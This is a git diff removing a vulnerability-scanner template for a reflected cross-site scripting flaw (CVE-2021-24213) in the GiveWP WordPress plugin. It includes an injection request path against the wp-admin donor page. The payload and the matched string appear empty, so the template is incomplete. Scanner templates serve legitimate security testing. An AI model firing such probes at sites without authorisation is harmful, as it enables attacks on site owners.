diff --git a/cves/2021/CVE-2021-24213.yaml b/cves/2021/CVE-2021-24213.yaml deleted file mode 100644 index 70284f7996..0000000000 --- a/cves/2021/CVE-2021-24213.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2021-24213 - -info: - name: GiveWP 2.9.7 Reflected Cross-Site Scripting - author: dhiyaneshDk - severity: medium - reference: https://packetstormsecurity.com/files/161933/WordPress-GiveWP-2.9.7-Cross-Site-Scripting.html - tags: cve,cve2021,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/edit.php?s=%22%3E&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200